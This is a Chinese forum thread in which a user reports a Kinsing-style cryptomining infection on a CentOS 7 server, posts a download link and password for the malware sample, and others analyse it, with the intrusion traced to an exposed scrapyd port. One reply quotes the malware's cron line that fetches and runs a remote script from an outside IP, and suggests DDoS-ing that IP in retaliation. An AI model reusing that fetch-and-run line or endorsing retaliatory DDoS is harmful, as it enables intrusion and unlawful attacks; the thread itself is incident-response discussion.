20191210今天发现Centos7服务器挖矿脚本希望问一下怎么解决？

qianxing

服务器：
Linux bigdata-service.futurelab.tv 3.10.0-1062.9.1.el7.x86_64 #1 SMP Fri Dec 6 15:49:49 UTC 2019 x86_64 x86_64 x86_64 GNU/Linux

NAME="CentOS Linux"
VERSION="7 (Core)"
ID="centos"
ID_LIKE="rhel fedora"
VERSION_ID="7"
PRETTY_NAME="CentOS Linux 7 (Core)"
ANSI_COLOR="0;31"
CPE_NAME="cpe:/o:centos:centos:7"
HOME_URL="https://www.centos.org/"
BUG_REPORT_URL="https://bugs.centos.org/"

CENTOS_MANTISBT_PROJECT="CentOS-7"
CENTOS_MANTISBT_PROJECT_VERSION="7"
REDHAT_SUPPORT_PRODUCT="centos"
REDHAT_SUPPORT_PRODUCT_VERSION="7"

脚本下载：https://www.lanzouj.com/i7xlqwj
解压密码：52pojie

爱吾爱

刚才看了一下 依牙牙 现成源码~~  一句一句读就懂了  先是把你的防火墙停掉  然后删除用户 锁定/root/.ssh/   在就是查看alyun保护程序   然后卸载~  中间一大段都是查找相关进程 然后强行终止  最后有download（）download2（）download3（）   echo "* * * * * $LDR http://185.92.74.42/sc.sh | sh > /dev/null 2>&1"   这个185.92.74.42 如该过是他的IP 直接搞一个DDOS攻击先把他服务器搞崩 （应该有俩） 如果是自己的  先到nginx里把访问路径换掉  还有这个“kinsing”    最最后应该是sed了这几个进程      先一个一个找到这几个发送文件  看看他们都和谁挂钩  或者是谁生产的  然后一步一步找到头      如果闲麻烦  还是备份好数据  然后 格式化  从装 恢复数据~

塞北的雪

备份数据，重装系统，恢复数据，你无法知道系统哪些文件被替换了

qianxing

爱吾爱 发表于 2019-12-10 17:18
刚才看了一下 依牙牙 现成源码~~  一句一句读就懂了  先是把你的防火墙停掉  然后删除用户 锁定/root/.ssh/ ...

感谢，我大概是找到漏洞了
是因为scrapyd公网暴露6800端口，他通过这个进行的入侵，现已解决。